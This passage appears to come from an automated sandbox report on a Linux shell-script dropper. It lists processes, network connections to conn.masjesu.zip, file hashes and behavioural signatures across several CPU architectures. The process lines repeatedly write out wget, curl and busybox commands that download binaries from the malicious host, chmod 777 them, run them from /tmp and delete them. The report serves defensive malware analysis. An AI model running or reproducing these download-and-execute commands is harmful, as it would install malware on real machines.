[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG

[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/rm

[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/chmod

[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d

[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/rm

[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/chmod

[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s

[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/rm

[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/chmod

[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t

[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/rm

[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/chmod

[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8

[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/rm

[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/chmod

[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv

[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/rm

[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/chmod

[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx

[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/rm

[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/chmod

[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM

[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/rm

[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:03

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:03

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

21s

Command Line

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:03

Platform

debian9-mipsbe-20240418-en

Max time kernel

81s

Max time network

83s

Command Line

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP N/A
N/A /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m N/A
N/A /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX N/A
N/A /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL N/A
N/A /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh N/A
N/A /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y N/A
N/A /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG N/A
N/A /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d N/A
N/A /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s N/A
N/A /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t N/A
N/A /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 N/A
N/A /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv N/A
N/A /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx N/A
N/A /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM N/A
N/A /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP N/A
N/A /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m N/A
N/A /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX N/A
N/A /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL N/A
N/A /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh N/A
N/A /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y N/A
N/A /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG N/A
N/A /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d N/A
N/A /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s N/A
N/A /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t N/A
N/A /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 N/A
N/A /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv N/A
N/A /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx N/A
N/A /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /usr/bin/curl N/A
File opened for modification /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /usr/bin/curl N/A
File opened for modification /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /usr/bin/curl N/A
File opened for modification /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /usr/bin/curl N/A
File opened for modification /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /usr/bin/curl N/A
File opened for modification /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /usr/bin/curl N/A
File opened for modification /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /usr/bin/curl N/A
File opened for modification /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /usr/bin/curl N/A
File opened for modification /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /usr/bin/curl N/A
File opened for modification /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /usr/bin/curl N/A
File opened for modification /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /usr/bin/curl N/A
File opened for modification /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /usr/bin/curl N/A
File opened for modification /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /usr/bin/curl N/A
File opened for modification /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /usr/bin/curl N/A
File opened for modification /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /usr/bin/curl N/A
File opened for modification /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /usr/bin/curl N/A
File opened for modification /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /usr/bin/curl N/A
File opened for modification /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /usr/bin/curl N/A
